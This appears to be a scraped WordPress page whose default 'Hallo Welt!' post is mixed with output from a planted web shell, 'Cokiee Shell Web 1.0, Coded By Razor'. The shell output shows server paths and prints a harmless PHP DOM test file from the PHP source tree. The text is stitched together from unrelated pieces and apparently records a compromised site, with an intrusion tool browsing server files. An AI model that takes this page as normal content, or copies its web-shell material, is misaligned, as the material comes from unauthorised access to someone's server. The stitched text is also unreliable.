Willkommen bei WordPress. Dies ist dein erster Beitrag. Bearbeite oder lösche ihn und beginne mit dem Schreiben!
Hallo Welt!
von raredesign | Dez 3, 2019 | Allgemein | 0 Kommentare
Cokiee Shell
Current Path : /usr/local/src/php7/php-7.0.5/ext/libxml/tests/ |
Current File : //usr/local/src/php7/php-7.0.5/ext/libxml/tests/bug54138_2.phpt |
--TEST-- Bug #54138 - DOMNode::getLineNo() doesn't return line number higher than 65535 --SKIPIF-- <?php if (!extension_loaded('dom')) die('skip dom extension not available'); if (LIBXML_VERSION < 20900) die('skip this test is for libxml >= 2.9.0 only'); if (defined('LIBXML_BIGLINES')) die('skip this test is for LIBXML_BIGLINES being undefined'); ?> --FILE-- <?php define('LIBXML_BIGLINES', 1<<22); $foos = str_repeat('<foo/>' . PHP_EOL, 65535); $xml = <<<XML <?xml version="1.0" encoding="UTF-8"?> <root> $foos <bar/> </root> XML; $dom = new DOMDocument(); $dom->loadXML($xml, LIBXML_BIGLINES); var_dump($dom->getElementsByTagName('bar')->item(0)->getLineNo()); ?> --EXPECT-- int(65540)
Cokiee Shell Web 1.0, Coded By Razor
Neueste Kommentare